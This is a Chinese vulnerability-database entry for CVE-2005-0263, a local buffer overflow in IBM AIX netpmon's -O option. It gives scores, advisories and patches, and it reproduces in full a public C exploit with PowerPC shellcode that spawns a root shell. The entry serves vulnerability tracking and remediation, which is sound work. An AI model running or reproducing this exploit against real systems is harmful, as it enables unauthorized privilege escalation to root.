CVE-2005-0263
CVSS7.2
发布时间 :2005-05-02 00:00:00
修订时间 :2008-09-05 16:45:47
NMCOE    

[原文]Buffer overflow in netpmon on AIX 5.1, 5.2, and 5.3 allows local users to execute arbitrary code via a long -O argument.


[CNNVD]IBM AIX netpmon本地缓冲区溢出漏洞(CNNVD-200505-507)

        IBM AIX是一款商业性质的操作系统。
        IBM AIX netpmon不正确处理-O选项,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能获得root用户权限。netpmon用于监视网络I/O和网络相关的CPU使用率,由于对-O选项的参数缺少充分缓冲区边界检查,提交超长参数作为-O选项值,可触发缓冲区溢出,可能获得root用户权限。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:ibm:aix:5.1IBM AIX 5.1
cpe:/o:ibm:aix:5.2IBM AIX 5.2
cpe:/o:ibm:aix:5.3IBM AIX 5.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0263
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0263
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-507
(官方数据源) CNNVD

- 其它链接及资源

http://www.idefense.com/application/poi/display?id=197&type=vulnerabilities
(VENDOR_ADVISORY)  IDEFENSE  20050210 IBM AIX netpmon Local Buffer Overflow Vulnerability
http://xforce.iss.net/xforce/xfdb/19278
(UNKNOWN)  XF  ibm-aix-netpmon-bo(19278)
http://www-1.ibm.com/support/search.wss?rs=0&q=IY67807&apar=only
(UNKNOWN)  AIXAPAR  IY67807
http://www-1.ibm.com/support/search.wss?rs=0&q=IY67136&apar=only
(UNKNOWN)  AIXAPAR  IY67136
http://www-1.ibm.com/support/search.wss?rs=0&q=IY67124&apar=only
(UNKNOWN)  AIXAPAR  IY67124
http://www.securityfocus.com/bid/12517
(UNKNOWN)  BID  12517
http://secunia.com/advisories/14237
(UNKNOWN)  SECUNIA  14237

- 漏洞信息

IBM AIX netpmon本地缓冲区溢出漏洞
高危 缓冲区溢出
2005-05-02 00:00:00 2005-10-20 00:00:00
本地  
        IBM AIX是一款商业性质的操作系统。
        IBM AIX netpmon不正确处理-O选项,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能获得root用户权限。netpmon用于监视网络I/O和网络相关的CPU使用率,由于对-O选项的参数缺少充分缓冲区边界检查,提交超长参数作为-O选项值,可触发缓冲区溢出,可能获得root用户权限。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        IBM AIX 5.1
        IBM netpmon_efix.tar.Z
        ftp://aix.software.ibm.com/aix/efixes/security/netpmon_efix.tar.Z
        IBM IY67807
        http://www-1.ibm.com/servers/eserver/support/pseries/aixfixes.html
        IBM AIX 5.2
        IBM netpmon_efix.tar.Z
        ftp://aix.software.ibm.com/aix/efixes/security/netpmon_efix.tar.Z
        IBM IY67136
        http://www-1.ibm.com/servers/eserver/support/pseries/aixfixes.html
        IBM AIX 5.3
        IBM netpmon_efix.tar.Z
        ftp://aix.software.ibm.com/aix/efixes/security/netpmon_efix.tar.Z
        IBM IY67124
        http://www-1.ibm.com/servers/eserver/support/pseries/aixfixes.html

- 漏洞信息 (1044)

AIX 5.2 netpmon Local Elevated Privileges Exploit (EDBID:1044)
aix local
2005-06-14 Verified
0 intropy
N/A [点击下载]
/*
 *
 *    IBM AIX netpmon elevated privileges exploit
 *
 *    I just wanted to play with PowerPC (Tested on 5.2)
 *
 *    intropy (intropy <at> caughq.org)
 *
 */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

#define DEBUG 1
#define BUFFERSIZE 2048
#define EGGSIZE 2048

#define NOP 0x60
#define ADDRESS 0x2ff22fff-(BUFFERSIZE/2)

char shellcode_binsh[] =
"\x7c\xa5\x2a\x79"     /* xor.    r5,r5,r5             */
"\x40\x82\xff\xfd"     /* bnel    <shellcode>          */
"\x7f\xe8\x02\xa6"     /* mflr    r31                  */
"\x3b\xff\x01\x20"     /* cal     r31,0x120(r31)       */
"\x38\x7f\xff\x08"     /* cal     r3,-248(r31)         */
"\x38\x9f\xff\x10"     /* cal     r4,-240(r31)         */
"\x90\x7f\xff\x10"     /* st      r3,-240(r31)         */
"\x90\xbf\xff\x14"     /* st      r5,-236(r31)         */
"\x88\x5f\xff\x0f"     /* lbz     r2,-241(r31)         */
"\x98\xbf\xff\x0f"     /* stb     r5,-241(r31)         */
"\x4c\xc6\x33\x42"     /* crorc   cr6,cr6,cr6          */
"\x44\xff\xff\x02"     /* svca                         */
"/bin/sh"
"\x05";

unsigned long cex_load_environment(char *env_buffer, char *address_buffer, char *payload, int environment_size, int buffer_size) {
        int count, env_size = strlen(payload) + environment_size + 4 + 1;
        unsigned long address, *ret_addressp;
        
        if (DEBUG) printf("Adding nops to environment buffer...");
        for ( count = 0; count < env_size - strlen(payload) - 1; count++ ) {
            *(env_buffer++) = NOP;
        }
        if (DEBUG) printf("size %d...\n", count);
        if (DEBUG) printf("Adding payload to environment buffer...");
        for ( count = 0; count < strlen(payload); count++ ) {
            *(env_buffer++) = payload[count];
        }
        if (DEBUG) printf("size %d...\n", count);

        env_buffer[env_size - 1] = '\0';

        memcpy(env_buffer, "CAU=", 4);

	memset(address_buffer, 'A', buffer_size);

        address = ADDRESS;

        if (DEBUG) printf("Going for address @ 0x%lx\n", address);

        if (DEBUG) printf("Adding return address to buffer...");
        ret_addressp = (unsigned long *)(address_buffer+3);
        for ( count = 0; count < buffer_size; count += 4) {
                *(ret_addressp++) = address;
        }
        if (DEBUG) printf("size %d...\n", count);

        address_buffer[buffer_size - 1] = '\0';

        return( 0 );
}

int main()
{
    char *buffer, *egg;
    char *args[3], *envs[2];

    buffer = (char *)malloc(BUFFERSIZE);
    egg = (char *)malloc(EGGSIZE);

    cex_load_environment(egg, buffer, (char *)&shellcode_binsh, EGGSIZE, BUFFERSIZE);

    args[0] = "/usr/bin/netpmon";
    args[1] = "-O";
    args[2] = buffer;
    args[3] = NULL;

    envs[0] = egg;
    envs[1] = NULL;

    execve( "/usr/bin/netpmon", args, envs );

    return( 0 );
}

// milw0rm.com [2005-06-14]
		

- 漏洞信息

13697
IBM AIX netpmon -O Parameter Local Overflow
Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2005-02-10 Unknow
2005-06-16 2005-03-23

- 解决方案

Currently, there are no known upgrades or patches to correct this vulnerability. It is possible to temporarily work around the flaw by implementing the following workaround: Only allow trusted users local access to security critical systems; only allow trusted users access to the "system" group. Alternately, remove the setuid bit from netpmon using chmod u-s /usr/bin/netpmon

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站